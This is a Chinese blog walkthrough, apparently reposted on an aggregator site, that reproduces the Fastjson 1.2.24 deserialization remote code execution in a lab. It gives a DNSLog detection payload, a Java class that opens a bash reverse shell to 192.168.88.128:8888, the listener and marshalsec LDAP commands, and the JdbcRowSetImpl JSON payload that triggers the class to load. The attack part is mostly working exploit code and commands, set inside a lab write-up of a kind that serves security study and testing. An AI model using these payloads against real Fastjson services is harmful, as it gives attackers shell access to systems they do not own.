码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Fastjson 反序列化漏洞[1.2.24-rce]


    漏洞复现环境搭建请参考

    http://t.csdnimg.cn/vSaaw

    kali切换jdk版本请参考

    Kali安装JAVA8和切换JDK版本的详细过程_kali安装jdk8-CSDN博客

    漏洞原理

    Fastjson提供的com.sun.rowset.JdbcRowSetImpl类下的dataSourceName方法支持传入一个RMI/LDAP源,支持远程调用。攻击者只需要创建一个恶意指令类(写入反弹shell等恶意命令),设置RMI/LDAP服务的远程加载指向该恶意类,即可做到远程任意命令执行

    漏洞版本

    fastjson<=1.2.24

    漏洞验证

    (1)Web访问,JSON页面

    (2)BP抓包,利用DNS回显验证,DNSLog Platform

    (3)修改提交方式为POST,加入以下内容,放包,DNS回显则证明漏洞存在

    1. #val的值为DNS申请的域名
    2. Content-Type:application/json
    3. {
    4. "a":{
    5. "@type":"java.net.Inet4Address",
    6. "val":"q6teka.dnslog.cn"
    7. }
    8. }

    漏洞利用

    (1)创建远程加载类,攻击机创建.java文件,内容如下,并进行java编译生成class文件

    1. #执行反弹shell,注意文件名需要和class类名称创建的一样
    2. import java.lang.Runtime;
    3. import java.lang.Process;
    4. public class getshell {
    5. static {
    6. try {
    7. Runtime rt = Runtime.getRuntime();
    8. String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.88.128/8888 0>&1"};
    9. Process pc = rt.exec(commands);
    10. pc.waitFor();
    11. } catch (Exception e) {
    12. // do nothing
    13. }
    14. }
    15. }

    (2)开启攻击机HTTP服务和反弹shell端口的监听

    1. python3 -m http.server 80
    2. nc -lvvp 8888

    (3)开启LDAP服务

    1. #工具获取
    2. git clone https://github.com/RandomRobbieBF/marshalsec-jar
    3. #开启LADP服务,端口6666,指定远程加载类为攻击机上的getshell
    4. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.88.128:80/#getshell 6666

    (4)回到站点,BP抓包,发送恶意数据,内容如下

    1. Content-Type:application/json
    2. {
    3. "b":{
    4. "@type":"com.sun.rowset.JdbcRowSetImpl",
    5. "dataSourceName":"ldap://192.168.88.128:6666/getshell",
    6. "autoCommit":true
    7. }
    8. }

    (5)放包,getshell

  • 相关阅读:
    逆地理编码-离线版-part3
    python asyncio websockets server
    【Oracle篇】rman全库异机恢复:从RAC环境到单机测试环境的转移(第四篇,总共八篇)
    Java.lang.Class类 newInstance()方法有什么功能呢?
    STM32中的加速度计驱动程序与姿态控制实现
    Vue思维导图,复习+预习,其中有些已经弃用了,下期总结下
    关于这个“微信提现”的问题,太炸裂了,以至于我写了段代码来验证!
    美妆行业的痛点问题以及解决办法
    Can Abnormality be Detected by Graph Neural Networks?
    家政服务小程序上门服务小程序预约上门服务维修保洁上门服务在线派单技师入口
  • 原文地址:https://blog.csdn.net/W13680336969/article/details/139253595
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号